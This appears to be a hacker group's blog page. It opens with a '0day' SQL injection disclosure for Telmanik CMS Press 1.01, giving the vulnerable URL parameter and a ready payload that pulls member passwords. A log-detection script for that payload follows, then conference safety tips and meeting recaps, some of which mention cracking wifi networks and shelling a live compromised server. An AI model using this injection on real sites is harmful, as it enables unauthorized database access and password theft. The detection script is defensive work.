Telmanik CMS Press 1.01 SQLi 0day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]

You have to format your injection like so:
union_select_row_from_table
Replacing spaces with “_”.

Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members

This is a special DefCon 21 kick off from me! See ya there 😉

Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny
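
A detection sketch for the request format shown above, added here as an example and not part of the original post: because the payload carries "_" where SQL has spaces, a signature that expects spaces or %20 between keywords will not match, so this normalizes underscores before matching. The Apache-style log layout, the sample lines (constructed) and the two keyword patterns are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Apache combined style (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2013:10:00:01 +0000] "GET /themes/pages.php?page_name=about_us HTTP/1.1" 200 5120
203.0.113.7 - - [01/Aug/2013:10:00:03 +0000] "GET /themes/pages.php?page_name=union_station_hours HTTP/1.1" 200 4096
203.0.113.9 - - [01/Aug/2013:10:00:05 +0000] "GET /themes/pages.php?page_name=union_select_password_from_members HTTP/1.1" 200 812
198.51.100.4 - - [01/Aug/2013:10:00:09 +0000] "GET /themes/pages.php?page_name=UNION%5FALL%5FSELECT%5Fx%5FFROM%5Fy HTTP/1.1" 200 640
"""

TARGET_PATH = "/themes/pages.php"   # script named in the advisory
PARAM = "page_name"                 # parameter named in the advisory

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Keyword shapes checked after normalization (illustrative, not exhaustive).
SQL_PATTERNS = [
    re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    re.compile(r"\bselect\s+\S.*?\s+from\s+\S"),
]


def normalize(value):
    """Treat '_' like whitespace, as the advisory's payload format does."""
    return re.sub(r"[\s_]+", " ", value).strip().lower()


def flag_requests(log_text):
    """Return (client_ip, normalized_value) for suspicious page_name values."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client_ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(TARGET_PATH):
            continue
        # parse_qs percent-decodes, so an encoded "%5F" becomes "_" here
        for raw in parse_qs(url.query).get(PARAM, []):
            value = normalize(raw)
            if any(p.search(value) for p in SQL_PATTERNS):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for client_ip, value in flag_requests(SAMPLE_LOG):
        print(client_ip, value)
```

Ordinary page names such as about_us or union_station_hours pass through unflagged; only values that read as SQL once the underscores become spaces are reported.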

Tips for dc414 members (and everyone else) at DEFCON21

Here are a few tips and guidelines to follow while in Vegas:

  • Keep an eye on dc414’s twitter, Facebook, and G+ feeds to keep up to date on what we are doing so you can join in on the fun.
  • If you have access to dc414’s VPN be sure to use it at all times on your tablet, phone, and laptop. If you do not have access to the VPN but have a server you can access “like one on your home connection”, set up an ssh tunnel and use it at all times.
  • Do not use USB sticks “or CDs/DVDs” from anyone, other than ones you brought yourself, including ones you find on the floor or parking lot.
  • Do not leave USB sticks laying out that you intend to use later.
  • Do not let anyone connect their phone to your system for charging or any other reason.
  • Do not connect your phone/tablet to anyone’s computer other than yours.
  • When using the local WiFi “hotel, convention center, etc”, do not visit any site you intend to log in to with the HTTP protocol “ie http://mail.dc414.org”; only connect using HTTPS “ie https://mail.dc414.org”.
  • Do not scan any QR codes with apps that do not verify the content before displaying it or opening other programs.
  • Do not ever leave your computer, phone, or tablet unattended.

dc414 @ barcampmke7

Last year’s barcampmke was awesome, everyone had lots of fun and met some great people. Some of you might remember we had a little stand last year and ran the good old wall of sheep, well we liked it so much that this year we decided to become an official sponsor of barcampmke and expand our operations. This year we will not only be doing the wall of sheep, but we will also be running a lockpick and tamper evident village, cat5 cable making couples contest, plus giving away free beer!! To get a free beer you have to either pick a lock from the village in under 2 minutes or reveal the secret message contained in a package secured with tamper evident labels, tape, lock seals, and tug tights, or beat your competitor to making a working cat5 cable! So sharpen up on your skills and win some free beer! See you at barcamp.

August meeting awesomeness

Klaiviel started us off by giving us a nice show of binary key card hotel locks popular overseas, showed us a 3d printed key for one of his locks, explained pick proof locks from the 40s that are no longer used but highly effective and how to make them today using regular locks. Then he showed us why he is the second best key impressionist in the world, and made a working key for a lock right in front of us, giving us step by step instructions on how to do it ourselves.

I stepped in and gave a quick demo of how I made our new and improved donations bucket which I will be making a blog post on later. Darkwind came packing with an alfa wifi antenna hooked up to a satellite dish! This made a killer directional wifi antenna, we took it up to the roof of bucketworks and got signals from all over including the moon 😛 Ngharo hooked it up to his lappy and cracked a few networks 🙂

After the roof party was over and we got back downstairs Castor gave a DEFCON20 badge hacking demo and showed us how to turn our badges into any other badge type we wanted, then showed us how to make the LEDs on the badge flash out words and stuffs. Then we all just started bull shitting and talking about upcoming projects.

Cmoney couldn’t make it out so I took a few pictures that you can view here. Congrats to darkwind and faraday for winning the dc414 free junk giveaway!!

dc414 @ DEFCON20

Most of the crew will be in Vegas for DEFCON20 this year!!! Let’s all get drunk and party! I will also be getting married while there to the super awesome cmoney!! For our brothers not going, we will be doing our best to drink your share of booze 🙂 I get the opportunity to speak on the DCG panel again this year so if you are at DC20 come check it out, me and other POCs will be laying down some knowledge for y’all. Also find me or other dc414 members so we can all party 😀 I will be taking lots of pictures and posting them on Twitter, Facebook, and G+ so be sure to check that shit out as well. See ya there.

May meeting recap.

May’s meeting was off the hook, one of our best yet! Lots of new faces which is always nice, good demos, and good beer. Ngharo started it off by talking about the hackathon and THOTCON. Klaiviel did his lock master thing and said a few words about TOOOL. Darkwind gave an awesome demo on sniffing pagers. It’s crazy to see all the pager traffic that is still out there. Then I showed off my Arduino windows attack tool and pwned a windows 7 box. There will be a blog post about that later. Congrats to Genero for winning the dc414 free junk giveaway! I did take a bunch of pictures but my phone was full of fail and didn’t save any of them 🙁 so no pictures of the meeting this time, sorry. I promise to do better next time 😛 later.

THOTCON greatness

This was the best THOTCON I have been to yet! Awesome talks, awesome beer, awesome food, and awesome people kinda sums it up for this year. Mine and ngharo’s talk went really well, and so far I have had lots of good feedback. I was a little drunk by the time we did our talk so that helped a lot, lol. My favorite talk was “Owning Payphones: 3650-Day Exploits” from savant, dude did a wonderful job and violated payphones in dirty ways! The one I learned the most from was “You put what in your DNS record?” from Mubix, yeah zone transfers are old school and I’ve been using it forever, but I had no idea you could do it to com and stuff, lol. Here are some pics of the swag and the con. Enjoy.

Me and ngharo giving our talk:

April fun

April’s meeting wasn’t for fools, it was for hackers 😛 It was another awesome meeting full of beer, pizza, lulz, and hacks. dw5304 got the night rolling with how to bypass windows 7 login password, then went on to talk about how to pwn Time Warner internet! Then Klaiviel gave us a 101 style schooling on hand cuffs, tumbler, combo, and tubular locks and some others! He also covered some car locks, key impression and stuff. He explained the different picking methods and the tools of the trade. Ngharo and I topped off by giving the talk we have prepared for THOTCON! It went well but it is clear we need a little practice before the big event.

Here are some pictures from the meeting thanx to cmoney. Congrats to Klaiviel for getting so many achievements for the Lock Master badge in one night and to The Professor for winning the dc414 free junk giveaway!! He got an awesome CD/DVD/DVD-R external drive “lol”, enjoy!

Big winner of free dc414 junk 🙂

dc414 meeting lulz – 2.3.12

February’s meeting was another one for the books. We had a full blown G+ hangout setup complete with a projector and a hand cam. A big thanks to bneu for providing the cam and darkwind for the capture device. I started the night off by making a few big announcements about me and ngharo speaking at THOTCON and how dc414 was picked by OpenDNS as an awesome user group “more on this later”. Then dw5304 informed us of Bucketworks’ network and financial situation and I’m proud to say dc414 stepped up right away. bneu is making a huge network equipment donation to Bucketworks, all dc414 donations for the night went to Bucketworks, and dc414 is going to put together a fundraiser for Bucketworks. More on all this later.

I started the presentations off with a big fail on cracking wep “ikr” I felt like a total n00b. I can do it I swear, lol. I did redeem myself by owning a VM system on a PBX by using a 0day I have “No I will not be giving out details on this, other than to those at the meeting and I will never do it again. It’s mine!” I didn’t stop there, to further redeem myself I gave a little demo on fimap and opened up a shell on a live compromised server 🙂 The fun wasn’t over yet. Vladimir gave us the 101 on Cat5 cable and a step by step to making your own cables. Then Vladimir and Darkwind had a cable making race and Darkwind smoked Vladimir bad! That’s not all, dw5304 replaced the back light on an old laptop, something I didn’t even know you could do. He took the screen apart and explained each step, then Vladimir schooled us on just how LCD’s and such work. Thank you everyone for your hard work!

Thanks to cmoney we have tons of great pictures from our last meeting here. Congrats go out to the free dc414 junk giveaway winners, Dan, Darkwind, and to Joel for winning the free THOTCON ticket.

Here is Dan and his new palm one mobile keyboard:

Darkwind and his ALFA 802.11n usb card:

Here is Joel after winning the THOTCON ticket:

Ok that’s it, peace out.

WIN a free pass to THOTCON 0x3 and go with dc414!

Ngharo and I will be giving a talk at THOTCON 0x3 in April and one “maybe two” lucky dc414 member(s) are coming with us! Our talk is titled “How I fucked your grandma”. It’s about the security implications of social communication, activity/wellness monitoring and home automation technology we are putting in the homes of the elderly designed for aging in place and the risks that go with it. It should be a good time and I know a good number of other dc414 members already have tickets so I’m sure we will also be raising some hell as well! 🙂 As a speaker I will have access to free beer….I hope our talk is early… if not I hope I’m not too wasted to stand by the time we go up, lol, and I hope to see you there!

For a chance to win a free ticket to THOTCON 0x3 just be at the next dc414 meeting, it will be part of the dc414 free junk give away.